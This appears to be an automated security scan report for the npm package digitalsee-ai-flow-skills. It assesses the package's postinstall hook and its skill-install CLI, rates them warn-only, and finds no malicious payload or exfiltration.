AI Security Review
scanned 16h ago · by lpm-firewall-aiLPM treats this as warn-only first-party agent extension lifecycle risk. The package has an install-time lifecycle hook that seeds AI Flow knowledge files into a home-directory app namespace. This is an agent extension lifecycle risk, but no confirmed malicious hijack or exfiltration behavior was found.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install postinstall; optional ai-flow-skills install/check CLI commands
Impact
Home-directory AI Flow knowledge/solution files are created or updated; user-invoked CLI may register skills globally for selected agents.
Mechanism
lifecycle copies bundled AI Flow docs; CLI can install bundled skills through skills CLI
Policy narrative
On install, postinstall seeds bundled knowledge and flow-solution documents into ~/.ai-flow. Full agent skill registration is exposed through a user-invoked CLI that calls npx skills add globally for a selected agent. The inspected files do not show unconsented mutation of foreign agent configs, persistence, credential access, or data exfiltration.
Rationale
Because lifecycle code writes agent-facing support content into a home-level package namespace, this should be warned as agent extension lifecycle risk. The stronger block condition is not met because foreign agent control-surface mutation is user-invoked and no malicious payload, harvesting, persistence, or exfiltration was found.
Evidence
package.jsonscripts/postinstall.shscripts/ai-flow-skills-cli.shscripts/install.shdist/claude-code/ai-flow/SKILL.mddist/claude-code/ai-flow-build/SKILL.md$HOME/.ai-flow/knowledge$HOME/.ai-flow/flow-solutionsdist/user-data/knowledgedist/user-data/flow-solutionsdist/claude-code
Network endpoints2
npm registry via npm view digitalsee-ai-flow-skills versionnpx skills add registry resolution
Decision evidence
public snapshotAI called this Suspicious at 86.0% confidence as Dangerous Capability with medium false-positive risk.
Evidence for warning
- package.json defines postinstall: bash scripts/postinstall.sh
- scripts/postinstall.sh automatically creates and writes $HOME/.ai-flow/knowledge and $HOME/.ai-flow/flow-solutions
- Package ships Claude Code skill documents under dist/claude-code/*/SKILL.md for agent behavior guidance
- scripts/ai-flow-skills-cli.sh user-invoked install runs npx skills add ... --global --copy
Evidence against
- postinstall only copies bundled dist/user-data files into package-owned ~/.ai-flow namespace
- No install-time writes to .claude, Cursor, MCP config, shell startup, VCS hooks, or autostart files found
- No credential harvesting, secret reads, or exfiltration logic found
- Network use is limited to user-invoked version check via npm view and user-invoked npx skills install
- Skill content is product-aligned AI Flow workflow guidance with explicit user confirmation gates for destructive actions
Behavioral surface
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = bash scripts/postinstall.sh
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = bash scripts/postinstall.sh
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgscripts/install.shView file
•path = scripts/install.sh
kind = build_helper
sizeBytes = 3815
magicHex = [redacted]
Medium
Ships Build Helper
Package ships non-JavaScript build or shell helper files.
scripts/install.shView on unpkgFindings
1 High2 Medium1 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumShips Build Helperscripts/install.sh
LowScripts Present